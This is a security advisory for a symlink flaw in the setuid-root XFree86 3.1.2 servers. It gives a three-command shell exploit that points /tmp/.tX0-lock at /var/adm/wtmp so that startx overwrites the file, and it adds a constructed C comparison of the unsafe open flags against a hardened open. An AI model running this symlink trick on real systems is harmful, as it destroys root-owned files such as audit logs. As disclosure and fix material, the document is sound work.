There are security holes in XFree86 3.1.2, which installs its servers
as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files,
it does not take proper precautions to ensure that file permissions are
maintained, resulting in the ability to overwrite files.

The problem stems from the server opening a temporary file,
/tmp/.tX0-lock, with the flags (O_WRONLY|O_CREAT|O_TRUNC). If this
file is made a symlink, the server will overwrite the file the link
points to, and then write its current pid to it.

Program:                    XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
Requirements:               account on system
Temporary Patch:            chmod o-x /usr/X11R6/bin/XF86*
Security Compromise:        overwrite arbitrary files
Author:                     Dave M. (davem@cmu.edu)
Synopsis:                   While running suid root, XFree86 servers do
                            not properly check file permissions, allowing
                            a user to overwrite arbitrary files on a
                            system.

Exploit:

$ ls -l /var/adm/wtmp
-rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
-r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp
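
The open flags named above next to a hardened open, as an added example in C that is not code from XFree86 or from the advisory's author. The function names, the private scratch directory and the victim file are constructed for illustration, and the ten-digit pid format is an assumption chosen to match the 11-byte size in the listing.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Flags from the advisory: follows a symlink and truncates its target. */
int open_lock_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0444);
}

/* Hardened: O_EXCL fails if the name exists at all (symlinks included),
 * O_NOFOLLOW is a second guard, and fstat() confirms what was opened. */
int open_lock_safe(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0444);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Write the pid; assumed format: ten characters plus newline (11 bytes). */
int write_pid(int fd) {
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", (long)getpid());
    return write(fd, buf, (size_t)n) == n ? 0 : -1;
}

/* Constructed demo in a private temp dir: a symlink already sits at the
 * lock name; run one opener and return the size of the link's target. */
long victim_size_after(int use_safe) {
    char dir[] = "/tmp/xlockdemo.XXXXXX", victim[64], lock[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("important log data\n", f); fclose(f);      /* 19 bytes */
    if (symlink(victim, lock) != 0) return -1;
    int fd = use_safe ? open_lock_safe(lock) : open_lock_unsafe(lock);
    if (fd >= 0) { write_pid(fd); close(fd); }
    if (stat(victim, &st) != 0) return -1;
    unlink(lock); unlink(victim); rmdir(dir);
    return (long)st.st_size;
}
```

With the advisory's flags the target shrinks to the 11-byte pid record; with the hardened open the call fails and the target keeps its 19 bytes.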